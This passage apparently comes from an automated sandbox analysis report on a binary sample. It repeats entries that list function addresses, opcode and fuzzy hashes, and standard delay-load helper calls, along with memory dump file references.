    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 0cd97f2c0011e0306666f10274ae54cee694486e47799882af3b41db74f2ddaa
    • Instruction ID: ec3561fa29f6296243e766a7a6ec02fa093fc06abe58d97ec7ee44334d5ab492
    • Opcode Fuzzy Hash: 0cd97f2c0011e0306666f10274ae54cee694486e47799882af3b41db74f2ddaa
    • Instruction Fuzzy Hash: 57B0928126A0027D3A8461A56802E3A0268C096B19330803FF602C1080E45018022072
    Function 00CAF3E0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: eae4d0b2fe8af7c679ee8401b0f0c8fc04fad7352edb246379153d5d2ec6364d
    • Instruction ID: 1dfcf99a423746faaa642ae3d8b6b4e0a605bbec89950de9f16b52f5a9a7b727
    • Opcode Fuzzy Hash: eae4d0b2fe8af7c679ee8401b0f0c8fc04fad7352edb246379153d5d2ec6364d
    • Instruction Fuzzy Hash: 7FB012C127B0037C3B8461A56C12F3B025CC5D5B19370803FF202C1080F4501C023072
    Function 00CAF3FE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: fa91e9895589104cfe8ac7ce043ff665838cf94db29aaf0ccab940b42a8ca919
    • Instruction ID: d25dd4680c86e346494eaedddbde8bb67a0e4a6267149d94a28b42f98d22d674
    • Opcode Fuzzy Hash: fa91e9895589104cfe8ac7ce043ff665838cf94db29aaf0ccab940b42a8ca919
    • Instruction Fuzzy Hash: EDB012E127A4037D3B8461A56D02F3B02ACC0D5B19330803FF202C5080F4901D033072
    Function 00CAF3F4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: d55f1fbb042494995280e96bd9f3cc3912ff7f198743b4ab0fced4bb16d3209f
    • Instruction ID: bb7f1c1e952f2528cd7123e75eda7879026f3c34e286646ef40cde993b893279
    • Opcode Fuzzy Hash: d55f1fbb042494995280e96bd9f3cc3912ff7f198743b4ab0fced4bb16d3209f
    • Instruction Fuzzy Hash: 05B012C127A2037D3BC461A56C02F3B026CC0D5B19330813FF202C1080F4501C423072
    Function 00CAF386 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: cbda7dcc0b406ee5cc42268f9876d5a0972f25d2daa6b31141a9a9622643cdf2
    • Instruction ID: 857c7eafde70b90ac72ad78e6fa37410c9674ef284e590b3e77f6f8b8421e505
    • Opcode Fuzzy Hash: cbda7dcc0b406ee5cc42268f9876d5a0972f25d2daa6b31141a9a9622643cdf2
    • Instruction Fuzzy Hash: 8DB012C127A4037C3B8461A56D02F3B021CC0D5B19330C03FF202C5180F4B01D0B3072
    Function 00CAF39A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: d32d0a0060e9486d480cb686906a64a89d244fa1945fde1267acc76b5cdb3e38
    • Instruction ID: 169fd64a5c5a068d2e012c7e11155ec0ebb690634c3441ced3c5e5615db574e1
    • Opcode Fuzzy Hash: d32d0a0060e9486d480cb686906a64a89d244fa1945fde1267acc76b5cdb3e38
    • Instruction Fuzzy Hash: C0B0929126A0026C3A8461A56802E3A0218C096B19330803FF602C1080E45019022072
    Function 00CAF390 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: dc3925d26da261f66e9c61d640669c5b7956e5b505fad95544d7c993e9906df7
    • Instruction ID: 256797ff2ac413693a468ed6a1085f24502323acebca1284390376c1e33e19b4
    • Opcode Fuzzy Hash: dc3925d26da261f66e9c61d640669c5b7956e5b505fad95544d7c993e9906df7
    • Instruction Fuzzy Hash: CBB012C127A0037C3B8461E56C02F3B031CC0D5B19370C43FF202C1180F4601C063072
    Function 00CAF3AE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: b2a352e0fd9c0df045287b1e51184541b817e757638900fdf27d6b21819a2bd8
    • Instruction ID: 8d172cd4997632790ca0a30a3c4565d10b5d3be7cf3f78acfd5cc8be79ea549c
    • Opcode Fuzzy Hash: b2a352e0fd9c0df045287b1e51184541b817e757638900fdf27d6b21819a2bd8
    • Instruction Fuzzy Hash: 7CB012D127A4037C3B8461A56D02F3B021CC0D6B19330803FF203C5080F4901E033072
    Function 00CAF3B8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: cdfc8df90c78e945b7c0001580693a8bc03671143470534a3e0535fef5d2e77f
    • Instruction ID: 5e36eb8ab51ff9237ac0113241300829fe99fe49b200e611d69763fe4d4d90a6
    • Opcode Fuzzy Hash: cdfc8df90c78e945b7c0001580693a8bc03671143470534a3e0535fef5d2e77f
    • Instruction Fuzzy Hash: 25B012D127A0037C3B8461A66C02F3B021CC0D6B19370803FF203C5080F4501D023072
    Function 00CAF34A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 0c49e35415ed3e515ead5613569e4b1af89c60bf73dd51540b955a4f9c9ae81c
    • Instruction ID: e083920e73f185e172965d55b9d4509d367a3382c75fccb5da67a8b2e708aa11
    • Opcode Fuzzy Hash: 0c49e35415ed3e515ead5613569e4b1af89c60bf73dd51540b955a4f9c9ae81c
    • Instruction Fuzzy Hash: B5B0928526A1026C3A8461A56802E3B0228C096B19330803FF602C1080E4501C022072
    Function 00CAF340 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 15c10979cc5454f736ef43564f87e281a4850f3b5c57fac609d346a265b9fa51
    • Instruction ID: 5abb2995a835ac60a89a1b1b3fb1b5a841aec171afa2228dfef166ad655ce1e1
    • Opcode Fuzzy Hash: 15c10979cc5454f736ef43564f87e281a4850f3b5c57fac609d346a265b9fa51
    • Instruction Fuzzy Hash: C0B012C127A1037C3B8461A9BC02F3B022CC0D5B19370813FF202C1080F4501C023472
    Function 00CAF354 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: bc2efbc3202609809abce83e926c27db65599b265a849460dfe6c37f2d64d26e
    • Instruction ID: 52832efd2ada895f78a2123b2ba9187e6f0ee1a7a8fea79040465c563b7b4819
    • Opcode Fuzzy Hash: bc2efbc3202609809abce83e926c27db65599b265a849460dfe6c37f2d64d26e
    • Instruction Fuzzy Hash: 82B012C527A2037C3FC461A56C02F3B026CC0D5B19330813FF202C10C0F4501C427072
    Function 00CAF368 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 0d1b257cccc647f26a5ccb39505e514ae00d8f09ca288d69f08461955f94cab5
    • Instruction ID: aa22df1f5faaefc65745e8510601bffbca94fdf054f3cee8be85a7c45194c001
    • Opcode Fuzzy Hash: 0d1b257cccc647f26a5ccb39505e514ae00d8f09ca288d69f08461955f94cab5
    • Instruction Fuzzy Hash: 1AB012C527A1077C3B8461A56C02F3B022CC0D5B19370803FF202C10C0F4501C023172
    Function 00CAF37C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 204f7cfa7da74724115879fc003363f572fa9a12b82a03a660c35dc69097fe17
    • Instruction ID: 69e0ce8934286e92d8d4e5bd3b890c04ef30a8d1bb2b3856aa742a03f673f04c
    • Opcode Fuzzy Hash: 204f7cfa7da74724115879fc003363f572fa9a12b82a03a660c35dc69097fe17
    • Instruction Fuzzy Hash: C8B012C127A1037C3BC461A56C02F3B021CC0D5B19330C13FF202C1180F4601C463072
    Function 00CAF372 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 7f5ecc9272277476614e30dcee6cf9a7021bf199f0316b3dd663cd9e166f0e56
    • Instruction ID: 6443f2803397d252c129f42a0787a3aaba4d618c6487ee8bb016bcd7701e4ccb
    • Opcode Fuzzy Hash: 7f5ecc9272277476614e30dcee6cf9a7021bf199f0316b3dd663cd9e166f0e56
    • Instruction Fuzzy Hash: 56B012C227A0037C3B8461A56C02F3F021CC0D6B1D330C03FF602C1180F4601C063072
    Function 00CAF31B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
